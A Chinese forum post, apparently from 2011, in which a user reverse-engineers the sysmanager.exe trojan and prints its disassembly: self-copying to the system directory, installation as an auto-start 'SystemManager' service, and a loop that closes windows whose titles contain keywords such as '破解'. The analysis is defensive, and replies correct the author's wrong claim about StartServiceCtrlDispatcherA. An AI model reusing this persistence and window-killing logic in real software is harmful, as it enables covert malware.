首页
论坛
课程
招聘
[原创]sysmanager.exe逆向分析
2011-7-15 20:23 8273

[原创]sysmanager.exe逆向分析

2011-7-15 20:23
8273
这几天不知道为啥子电脑速度特别慢,而且有些网页打开后就直接将浏览器关闭了,搞得我很郁闷.用杀毒软件查杀,结果啥都没查出来...于是很纠结,还是手动杀毒比较靠谱...因为这些网页打开的都有些破解,逆向等字眼,所以就怀疑它是根据关键字来进行工作的,于是新建了一个“逆向破 解.txt”,用记事本打开,果然:一打开它就关闭了,换editplus打开,结果还是一样,而换了文件名打开就正常了.
      因为对于每个进程都会产生这种情况,所以初步怀疑是dll注入,可对照两个进程的dll,除了系统的dll,貌似也没啥子问题,而注入系统dll的可能性不大,所以还是另寻他法吧。
     将电脑在安全模式下打开,观察进程列表,然后电脑正常模式下打开,观察进程列表,然后再进行一个一个排除。           
      经过反复的测试,确定是sysmanager.exe文件的问题,关闭进程,结果能正常运行。结果百度了下该进程,果然是个病毒木马程序,然后清理注册表,删除程序,ok,杀毒完毕!!!
     本来到这里都应该结束了,但是一时也没啥事干,而且这东西搞得我郁闷无比!!!所以还是决定分析下。
    PEiD查壳:Microsoft Visual C++ 6.0
    这是一个好消息,接着就IDA + OD进行分析吧.
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
.text:004014F0 _WinMain@16     proc near               ; CODE XREF: start+12Fp
.text:004014F0
.text:004014F0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004014F0 var_8           = dword ptr -8
.text:004014F0 var_4           = dword ptr -4
.text:004014F0 hInstance       = dword ptr  4
.text:004014F0 hPrevInstance   = dword ptr  8
.text:004014F0 Str1            = dword ptr  0Ch
.text:004014F0 nShowCmd        = dword ptr  10h
.text:004014F0
.text:004014F0                 sub     esp, 10h
.text:004014F3                 call    sub_401000
.text:004014F8                 call    ds:GetCurrentThreadId
.text:004014FE                 mov     dword_403068, eax
.text:00401503                 xor     eax, eax
.text:00401505                 mov     [esp+10h+var_8], eax
.text:00401509                 mov     [esp+10h+var_4], eax
.text:0040150D                 mov     eax, [esp+10h+Str1]
//判断是否为删除指令,如果是,那么删除服务,卸载程序
.text:00401511                 push    offset Str2     ; "/uninstall"
.text:00401516                 push    eax             ; Str1
.text:00401517                 mov     [esp+18h+ServiceStartTable.lpServiceName], offset ServiceName ; "SystemManager"
.text:0040151F                 mov     [esp+18h+ServiceStartTable.lpServiceProc], offset loc_401450
.text:00401527                 call    ds:_stricmp
.text:0040152D                 add     esp, 8
.text:00401530                 test    eax, eax
.text:00401532                 jnz     short loc_401541
.text:00401534                 call    sub_401220
.text:00401539                 xor     eax, eax
.text:0040153B                 add     esp, 10h
.text:0040153E                 retn    10h
.text:00401541 ; ---------------------------------------------------------------------------
.text:00401541
.text:00401541 loc_401541:                             ; CODE XREF: WinMain(x,x,x,x)+42j
.text:00401541                 call    sub_401040
.text:00401546                 lea     ecx, [esp+10h+ServiceStartTable]
//函数StartServiceCtrlDispatcherA的利用
//对于每一个新建的进程,创建一个线程,进行检测操作
.text:0040154A                 push    ecx             ; lpServiceStartTable
.text:0040154B                 call    ds:StartServiceCtrlDispatcherA
.text:00401551                 xor     eax, eax
.text:00401553                 add     esp, 10h
.text:00401556                 retn    10h
.text:00401556 _WinMain@16     endp



typedef struct _SERVICE_TABLE_ENTRY {
  LPTSTR lpServiceName;
  LPSERVICE_MAIN_FUNCTION lpServiceProc;
} SERVICE_TABLE_ENTRY,
lpServiceProc = 401450


//将sysmanager.exe复制到系统目录,并创建启动服务
.text:00401040                 sub     esp, 220h
.text:00401046                 lea     eax, [esp+220h+NewFileName]
.text:0040104A                 push    ebx
.text:0040104B                 push    esi
.text:0040104C                 push    edi
.text:0040104D                 push    100h            ; uSize
.text:00401052                 push    eax             ; lpBuffer
.text:00401053                 call    ds:GetSystemDirectoryA
.text:00401059                 mov     edi, offset aSysmanager_exe ; "\\sysmanager.exe"
.text:0040105E                 or      ecx, 0FFFFFFFFh
.text:00401061                 xor     eax, eax
.text:00401063                 lea     edx, [esp+22Ch+NewFileName]
.text:00401067                 repne scasb
.text:00401069                 not     ecx
.text:0040106B                 sub     edi, ecx
.text:0040106D                 push    104h            ; nSize
.text:00401072                 mov     esi, edi
.text:00401074                 mov     ebx, ecx
.text:00401076                 mov     edi, edx
.text:00401078                 or      ecx, 0FFFFFFFFh
.text:0040107B                 repne scasb
.text:0040107D                 mov     ecx, ebx
.text:0040107F                 dec     edi
.text:00401080                 shr     ecx, 2
.text:00401083                 rep movsd
.text:00401085                 mov     ecx, ebx
.text:00401087                 lea     eax, [esp+230h+ExistingFileName]
.text:0040108E                 and     ecx, 3
.text:00401091                 push    eax             ; lpFilename
.text:00401092                 rep movsb
.text:00401094                 push    0               ; hModule
//获取自身程序名
.text:00401096                 call    ds:GetModuleFileNameA
.text:0040109C                 lea     ecx, [esp+22Ch+NewFileName]
.text:004010A0                 push    0               ; bFailIfExists
.text:004010A2                 lea     edx, [esp+230h+ExistingFileName]
.text:004010A9                 push    ecx             ; lpNewFileName
.text:004010AA                 push    edx             ; lpExistingFileName
//复制文件
.text:004010AB                 call    ds:CopyFileA
.text:004010B1                 test    eax, eax
.text:004010B3                 jnz     short loc_4010BF
.text:004010B5                 pop     edi
.text:004010B6                 pop     esi
.text:004010B7                 pop     ebx
.text:004010B8                 add     esp, 220h
.text:004010BE                 retn
.text:004010BF ; ---------------------------------------------------------------------------
.text:004010BF
.text:004010BF loc_4010BF:                             ; CODE XREF: sub_401040+73j
.text:004010BF                 push    0F003Fh         ; dwDesiredAccess
.text:004010C4                 push    0               ; lpDatabaseName
.text:004010C6                 push    0               ; lpMachineName
//打开服务管理
.text:004010C8                 call    ds:OpenSCManagerA
.text:004010CE                 test    eax, eax
.text:004010D0                 mov     hSCObject, eax
.text:004010D5                 jnz     short loc_4010E1
.text:004010D7                 pop     edi
.text:004010D8                 pop     esi
.text:004010D9                 pop     ebx
.text:004010DA                 add     esp, 220h
.text:004010E0                 retn
.text:004010E1 ; ---------------------------------------------------------------------------
.text:004010E1
.text:004010E1 loc_4010E1:                             ; CODE XREF: sub_401040+95j
.text:004010E1                 push    0               ; lpPassword
.text:004010E3                 push    0               ; lpServiceStartName
.text:004010E5                 push    offset Dependencies ; lpDependencies
.text:004010EA                 push    0               ; lpdwTagId
.text:004010EC                 lea     ecx, [esp+23Ch+NewFileName]
.text:004010F0                 push    0               ; lpLoadOrderGroup
.text:004010F2                 push    ecx             ; lpBinaryPathName
.text:004010F3                 mov     ebx, 2
.text:004010F8                 push    1               ; dwErrorControl
.text:004010FA                 push    ebx             ; dwStartType
.text:004010FB                 push    110h            ; dwServiceType
.text:00401100                 push    0F01FFh         ; dwDesiredAccess
.text:00401105                 push    offset ServiceName ; "SystemManager"
.text:0040110A                 push    offset ServiceName ; "SystemManager"
.text:0040110F                 push    eax             ; hSCManage
//创建服务
.text:00401110                 call    ds:CreateServiceA
.text:00401116                 mov     esi, ds:GetLastError
.text:0040111C                 mov     dword_403060, eax
.text:00401121                 test    eax, eax
.text:00401123                 jnz     short loc_40117C
.text:00401125                 call    esi ; GetLastError
.text:00401127                 cmp     eax, 431h
.text:0040112C                 jz      short loc_401147
.text:0040112E                 mov     edx, hSCObject
.text:00401134                 push    edx             ; hSCObject
.text:00401135                 call    ds:CloseServiceHandle
.text:0040113B                 pop     edi
.text:0040113C                 pop     esi
.text:0040113D                 xor     eax, eax
.text:0040113F                 pop     ebx
.text:00401140                 add     esp, 220h
.text:00401146                 retn
.text:00401147 ; ---------------------------------------------------------------------------
.text:00401147
.text:00401147 loc_401147:                             ; CODE XREF: sub_401040+ECj
.text:00401147                 mov     eax, hSCObject
.text:0040114C                 push    10h             ; dwDesiredAccess
.text:0040114E                 push    offset ServiceName ; "SystemManager"
.text:00401153                 push    eax             ; hSCManager
//打开服务
.text:00401154                 call    ds:OpenServiceA
.text:0040115A                 test    eax, eax
.text:0040115C                 mov     dword_403060, eax
.text:00401161                 jnz     short loc_40117C
.text:00401163                 mov     ecx, hSCObject
.text:00401169                 push    ecx             ; hSCObject
.text:0040116A                 call    ds:CloseServiceHandle
.text:00401170                 pop     edi
.text:00401171                 pop     esi
.text:00401172                 xor     eax, eax
.text:00401174                 pop     ebx
.text:00401175                 add     esp, 220h
.text:0040117B                 retn


//删除服务
sub_401220      proc near               ; CODE XREF: WinMain(x,x,x,x)+44p
.text:00401220                 push    esi
.text:00401221                 push    0F003Fh         ; dwDesiredAccess
.text:00401226                 push    0               ; lpDatabaseName
.text:00401228                 push    0               ; lpMachineName
.text:0040122A                 call    ds:OpenSCManagerA
.text:00401230                 test    eax, eax
.text:00401232                 mov     hSCObject, eax
.text:00401237                 jz      loc_4012C3
.text:0040123D                 push    0F01FFh         ; dwDesiredAccess
.text:00401242                 push    offset ServiceName ; "SystemManager"
.text:00401247                 push    eax             ; hSCManager
.text:00401248                 call    ds:OpenServiceA
.text:0040124E                 test    eax, eax
.text:00401250                 mov     dword_403060, eax
.text:00401255                 jz      short loc_4012C3
.text:00401257                 push    offset ServiceStatus ; lpServiceStatus
.text:0040125C                 push    eax             ; hService
.text:0040125D                 call    ds:QueryServiceStatus
.text:00401263                 cmp     ServiceStatus.dwCurrentState, 4
.text:0040126A                 jnz     short loc_40127F
.text:0040126C                 mov     eax, dword_403060
.text:00401271                 push    offset ServiceStatus ; lpServiceStatus
.text:00401276                 push    1               ; dwControl
.text:00401278                 push    eax             ; hService
.text:00401279                 call    ds:ControlService
.text:0040127F
.text:0040127F loc_40127F:                             ; CODE XREF: sub_401220+4Aj
.text:0040127F                 mov     ecx, dword_403060
.text:00401285                 push    ecx             ; hService
.text:00401286                 call    ds:DeleteService
.text:0040128C                 test    eax, eax
.text:0040128E                 jz      short loc_4012AB
.text:00401290                 mov     edx, hSCObject
.text:00401296                 mov     esi, ds:CloseServiceHandle
.text:0040129C                 push    edx             ; hSCObject
.text:0040129D                 call    esi ; CloseServiceHandle
.text:0040129F                 mov     eax, dword_403060
.text:004012A4                 push    eax             ; hSCObject
.text:004012A5                 call    esi ; CloseServiceHandle
.text:004012A7                 xor     eax, eax
.text:004012A9                 pop     esi
.text:004012AA                 retn



xt:00401450 loc_401450:                             ; DATA XREF: WinMain(x,x,x,x)+2Fo
.text:00401450                 push    offset sub_4012D0
.text:00401455                 push    offset ServiceName ; "SystemManager"
.text:0040145A                 mov     ServiceStatus.dwCurrentState, 2
.text:00401464                 mov     ServiceStatus.dwControlsAccepted, 3
.text:0040146E                 call    ds:RegisterServiceCtrlHandlerA
.text:00401474                 test    eax, eax
.text:00401476                 mov     hServiceStatus, eax
.text:0040147B                 jz      short locret_4014E4
.text:0040147D                 push    esi
.text:0040147E                 mov     esi, ds:SetServiceStatus
.text:00401484                 push    offset ServiceStatus
.text:00401489                 push    eax
.text:0040148A                 call    esi ; SetServiceStatus
.text:0040148C                 mov     eax, hServiceStatus
.text:00401491                 push    offset ServiceStatus
.text:00401496                 push    eax
.text:00401497
.text:00401497 __cfltcvt_init:
.text:00401497                 mov     ServiceStatus.dwWin32ExitCode, 0
.text:004014A1                 mov     ServiceStatus.dwCheckPoint, 0
.text:004014AB                 mov     ServiceStatus.dwWaitHint, 0
.text:004014B5                 mov     ServiceStatus.dwCurrentState, 4
.text:004014BF                 call    esi ; SetServiceStatus
.text:004014C1                 push    0
.text:004014C3                 push    0
.text:004014C5                 push    0
.text:004014C7                 push    offset sub_401380
.text:004014CC                 push    0
.text:004014CE                 push    0
.text:004014D0                 call    ds:CreateThread
.text:004014D6                 test    eax, eax
.text:004014D8                 pop     esi
.text:004014D9                 jz      short locret_4014E4
.text:004014DB                 push    0FFFFFFFFh
.text:004014DD                 push    eax
.text:004014DE                 call    ds:WaitForSingleObject
.text:004014E4
.text:004014E4 locret_4014E4:                          ; CODE XREF: .text:0040147Bj
.text:004014E4                                         ; .text:004014D9j
.text:004014E4                 retn


对于每个新建的进程,都创建一个线程,线程函数地址:sub_401380

sub_401380      proc near               ; DATA XREF: .text:004014C7o
.text:00401380
.text:00401380 String          = byte ptr -104h
.text:00401380
.text:00401380                 sub     esp, 104h
.text:00401386                 push    ebx
.text:00401387                 mov     ebx, ds:_mbsstr
.text:0040138D                 push    esi
.text:0040138E                 push    edi
.text:0040138F
.text:0040138F loc_40138F:                             ; CODE XREF: sub_401380+47j
.text:0040138F                                         ; sub_401380+BEj
.text:0040138F                 push    3E8h            ; dwMilliseconds
.text:00401394                 call    ds:Sleep
.text:0040139A                 xor     eax, eax
.text:0040139C                 mov     ecx, 19h
.text:004013A1                 mov     edi, offset dword_403094
.text:004013A6                 push    eax             ; lParam
.text:004013A7                 rep stosd
.text:004013A9                 push    offset EnumFunc ; lpEnumFunc
.text:004013AE                 mov     dword_403224, 0
.text:004013B8                 call    ds:EnumWindows //枚举窗口
.text:004013BE                 mov     eax, dword_403224
.text:004013C3                 xor     edi, edi
.text:004013C5                 test    eax, eax
.text:004013C7                 jle     short loc_40138F
.text:004013C9                 mov     esi, offset dword_403094
.text:004013CE
.text:004013CE loc_4013CE:                             ; CODE XREF: sub_401380+BCj
.text:004013CE                 mov     eax, [esi]
.text:004013D0                 test    eax, eax
.text:004013D2                 jz      short loc_401431
.text:004013D4                 lea     ecx, [esp+110h+String]
.text:004013D8                 push    80h             ; nMaxCount
.text:004013DD                 push    ecx             ; lpString
.text:004013DE                 push    eax             ; hWnd
.text:004013DF                 call    ds:GetWindowTextA //获取窗口文本
.text:004013E5                 test    eax, eax
.text:004013E7                 jz      short loc_401431
.text:004013E9                 lea     edx, [esp+110h+String]
.text:004013ED                 push    offset unk_403040
.text:004013F2                 push    edx
.text:004013F3                 call    ebx ; _mbsstr
.text:004013F5                 add     esp, 8
.text:004013F8                 test    eax, eax
.text:004013FA                 jnz     short loc_401422
.text:004013FC                 lea     eax, [esp+110h+String]
.text:00401400                 push    offset aI       ; "专用"
.text:00401405                 push    eax
.text:00401406                 call    ebx ; _mbsstr   //检测关键字:专用
.text:00401408                 add     esp, 8
.text:0040140B                 test    eax, eax
.text:0040140D                 jnz     short loc_401422
.text:0040140F                 lea     ecx, [esp+110h+String]
.text:00401413                 push    offset aT       ; "破解"
.text:00401418                 push    ecx
.text:00401419                 call    ebx ; _mbsstr  //检测关键字:破解
.text:0040141B                 add     esp, 8
.text:0040141E                 test    eax, eax
.text:00401420                 jz      short loc_401431
.text:00401422
.text:00401422 loc_401422:                             ; CODE XREF: sub_401380+7Aj
.text:00401422                                         ; sub_401380+8Dj
.text:00401422                 mov     edx, [esi]
.text:00401424                 push    0               ; lParam
.text:00401426                 push    0               ; wParam
.text:00401428                 push    10h             ; Msg
.text:0040142A                 push    edx             ; hWnd
.text:0040142B                 call    ds:SendMessageA   //发送消息,关闭进程
.text:00401431
.text:00401431 loc_401431:                             ; CODE XREF: sub_401380+52j
.text:00401431                                         ; sub_401380+67j ...
.text:00401431                 mov     eax, dword_403224
.text:00401436                 inc     edi
.text:00401437                 add     esi, 4
.text:0040143A                 cmp     edi, eax
.text:0040143C                 jl      short loc_4013CE
.text:0040143E                 jmp     loc_40138F
.text:0040143E sub_401380      endp


一些感触:
到这里就分析完毕了,终于知道啥原因了,同时也学了个函数StartServiceCtrlDispatcherA,这是一个好函数,用来做文件监控真是再好不过了,而且可以对一些关键字进行过滤,假如:有关破解逆向的网页全部都被屏蔽掉了.好东西,学习了.

[2022夏季班]《安卓高级研修班(网课)》月薪三万班招生中~

收藏
点赞0
打赏
分享
最新回复 (6)
雪    币: 7510
活跃值: 活跃值 (402)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
achillis 活跃值 15 2011-7-15 20:26
2
0
StartServiceCtrlDispatcher只是个服务程序相关的函数而已,跟文件监控啥的真没关系。。。
雪    币: 98
活跃值: 活跃值 (12)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
古越魂 活跃值 1 2011-7-15 20:48
3
0
向它这样的关键字过滤呢?不是也挺不错的嘛
雪    币: 270
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
swzices 活跃值 2011-7-25 12:15
4
0
关键字过滤其实就是枚举+比较然后操作。没什么特点,至于StartServiceCtrlDispatcher如教主所说就是一个简单的服务控制操作函数而已~
雪    币: 40
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
winsee 活跃值 2011-7-25 20:42
5
0
能中这样的木马,真有你的了
雪    币: 98
活跃值: 活跃值 (12)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
古越魂 活跃值 1 2011-7-28 20:50
6
0
调试个小玩意,谁知里面有这东西....囧的
雪    币: 603
活跃值: 活跃值 (18)
能力值: ( LV9,RANK:140 )
在线值:
发帖
回帖
粉丝
zhaokang 活跃值 3 2011-9-6 15:10
7
0
求bin,想看下,分析下..上bin吧..
游客
登录 | 注册 方可回帖
返回